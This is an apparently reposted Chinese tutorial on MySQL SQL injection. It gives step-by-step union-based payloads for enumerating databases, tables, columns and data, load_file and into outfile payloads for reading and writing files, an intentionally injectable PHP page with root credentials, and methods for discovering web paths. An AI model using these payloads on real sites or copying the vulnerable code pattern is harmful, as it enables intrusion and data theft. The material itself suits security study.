sql注入--mysql

mysql数据库结构:

  数据库A  --> 表名  --> 列名 --> 数据

  数据库B  --> 表名  --> 列名 --> 数据

 

mysql数据库信息:

  mysql 5.0以上自带数据库:information_schema

  information_schema.schemata: 数据库下的schemata库名,含义:存储所有数据库下的库名信息的表。

  information_schema.tables: 数据库下的tables表名,含义:存储所有数据库下的表名信息的表。

  information_schema.columns: 数据库下的columns表名,含义:存储所有数据库下的列名信息的表。

  database():数据库名

  user():数据库用户

  version():数据库版本

  @@version_compile_os:操作系统 

  schema_name:库名

  table_name:表名

  column_name:列名

 

mysql注入过程:

  (1) 判断注入点:  ?id=1 and 1=1 ;? id=1 and 1=2

  (2) 判断长度: ?id=1 order by 3

  (3) 获取基本信息: @@version_compile_os , version()  , database()  , user()

  (4) 获取库名: ?id=1 union select table_schema,2,3 from information_schema.schemata

  (5) 获取表名: ?id=1 union select table_name,2,3 from information_schema.tables where table_schema = 库名[16进制]

  (6) 获取列名: ?id=1 union select column_name,2,3 from information_schema.columns where table_schema = 库名[16进制]

         and table_name = 表名[16进制]

  (7) 获取数据: ?id=1 union select 列名[16进制],列名[16进制],3 from 表名[16进制]

 

mysql文件读写操作:

  (1) 读取操作:

      ?id=1 union select load_file('d:/123.txt'),2,3 

  (2) 写入操作:

      ?id=1 union select '123',2,3 into outfile 'd:/123.txt'

  注意: 路径问题:

        使用"/"或者"\\" ; 原因[编程中"\"多半是转义]

      编码问题:

        数据中有单引号,将数据编码16进制即可

 

连接mysql数据库语句:

    header("content-type:text/html;charset=utf8");
  $id=$_GET['x'];
  $conn=mysql_connect("127.0.0.1","root","root");
  mysql_select_db("sql",$conn);
  $sql = "select * from php where id=$id";
  $result=mysql_query($sql);
  while($row=mysql_fetch_array($result)){
  echo "
"."编号".$row['id']."
";
  echo "
"."用户".$row['user']."
";
  echo "
"."密码".$row['password']."
";
  }
  mysql_close($conn);
  echo "
"."当前执行的sql语句:".$sql;
  ?>

 

网站路径获取方法

  (1) 遗留文件:

       一般在网站根目录下,命名有php.php info.php phpinfo.php,test.php php_info.php等。

            sql注入--mysql_第1张图片

  (2) 报错显示

            

  (3)漏洞爆路径

         sql注入--mysql_第2张图片

 

  (4) 读取搭建平台配置文件

            sql注入--mysql_第3张图片

  (5)社工(字典猜解,谷歌黑客等)

      D:/www/ ; D:/wwwroot/ ; D:/web/ 等

            sql注入--mysql_第4张图片

 

 

 

转载于:https://www.cnblogs.com/China-Waukee/p/9606656.html

你可能感兴趣的:(sql注入--mysql)